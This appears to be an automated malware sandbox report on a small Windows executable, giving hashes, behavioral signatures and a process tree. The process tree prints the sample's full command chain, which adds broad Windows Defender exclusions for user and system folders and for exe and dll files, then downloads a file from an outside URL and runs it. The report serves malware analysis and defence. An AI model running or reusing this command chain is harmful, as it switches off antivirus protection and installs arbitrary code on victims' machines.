Analysis
-
max time kernel
122s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
31/12/2023, 04:46
Static task
static1
Behavioral task
behavioral1
Sample
28bd2f6cf3be54b6e327e138ab77a2d2.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
28bd2f6cf3be54b6e327e138ab77a2d2.exe
Resource
win10v2004-20231215-en
General
-
Target
28bd2f6cf3be54b6e327e138ab77a2d2.exe
-
Size
7KB
-
MD5
28bd2f6cf3be54b6e327e138ab77a2d2
-
SHA1
80a050b5bb1109ed1658fe5a3fab14efd9f8f8da
-
SHA256
6e03bb842f310100ddaf188671b4866b7f6db3012ae676cbcafdefcc389c15c2
-
SHA512
49d9e86a16510d65493ea3731755c0afe68b31a9dcd160299031a88b187e49ade2b5838013a53d2ab7e81e9ada7e42cd60e605aee03d5297901be1af6dafdb8b
-
SSDEEP
96:IF04XHsqJa2IyWuQ25p9Tn7hats0QC6Btgvg6oK04LEfkk33aLlYR:IF0wsqJa9ruQ25TwGzBtg0K04Vk3aY
Malware Config
Extracted
https://example.com/download.exe
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 1704 powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1640 powershell.exe 2732 powershell.exe 1704 powershell.exe 108 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1640 powershell.exe Token: SeDebugPrivilege 2732 powershell.exe Token: SeDebugPrivilege 1704 powershell.exe Token: SeDebugPrivilege 108 powershell.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 1436 wrote to memory of 1740 1436 28bd2f6cf3be54b6e327e138ab77a2d2.exe 28 PID 1436 wrote to memory of 1740 1436 28bd2f6cf3be54b6e327e138ab77a2d2.exe 28 PID 1436 wrote to memory of 1740 1436 28bd2f6cf3be54b6e327e138ab77a2d2.exe 28 PID 1436 wrote to memory of 1740 1436 28bd2f6cf3be54b6e327e138ab77a2d2.exe 28 PID 1740 wrote to memory of 1640 1740 cmd.exe 30 PID 1740 wrote to memory of 1640 1740 cmd.exe 30 PID 1740 wrote to memory of 1640 1740 cmd.exe 30 PID 1740 wrote to memory of 1640 1740 cmd.exe 30 PID 1740 wrote to memory of 2732 1740 cmd.exe 31 PID 1740 wrote to memory of 2732 1740 cmd.exe 31 PID 1740 wrote to memory of 2732 1740 cmd.exe 31 PID 1740 wrote to memory of 2732 1740 cmd.exe 31 PID 1740 wrote to memory of 1704 1740 cmd.exe 32 PID 1740 wrote to memory of 1704 1740 cmd.exe 32 PID 1740 wrote to memory of 1704 1740 cmd.exe 32 PID 1740 wrote to memory of 1704 1740 cmd.exe 32 PID 1740 wrote to memory of 108 1740 cmd.exe 33 PID 1740 wrote to memory of 108 1740 cmd.exe 33 PID 1740 wrote to memory of 108 1740 cmd.exe 33 PID 1740 wrote to memory of 108 1740 cmd.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\28bd2f6cf3be54b6e327e138ab77a2d2.exe"C:\Users\Admin\AppData\Local\Temp\28bd2f6cf3be54b6e327e138ab77a2d2.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Windows\SysWOW64\cmd.execmd /c powershell -Command Add-MpPreference -ExclusionPath @('%UserProfile%','%AppData%','%Temp%','%SystemRoot%','%HomeDrive%','%SystemDrive%') -Force & powershell -Command Add-MpPreference -ExclusionExtension @('exe','dll') -Force & powershell (New-Object System.Net.WebClient).DownloadFile('https://example.com/download.exe', '%Temp%\File.exe') & powershell Start-Process -FilePath '%Temp%\File.exe' & exit2⤵
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath @('C:\Users\Admin','C:\Users\Admin\AppData\Roaming','C:\Users\Admin\AppData\Local\Temp','C:\Windows','C:','C:') -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1640
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionExtension @('exe','dll') -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2732
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('https://example.com/download.exe', 'C:\Users\Admin\AppData\Local\Temp\File.exe')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\File.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:108
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5561145e75029e6bbbc5b448649f89469
SHA1dcf5c52a271c268760dd9c7fca8556e860083007
SHA2566c9becd55e98b57a074f58b7559fec080c38aad76de8352d5f482db505b131a8
SHA5129c62ba8b17ab3dc3f2866c1baa4fe6038e444758578a1737d11057f31554b30e88be7cd5475caf8b50485c43aba177978030bcea917a8adfb0284f6d6eb8dd69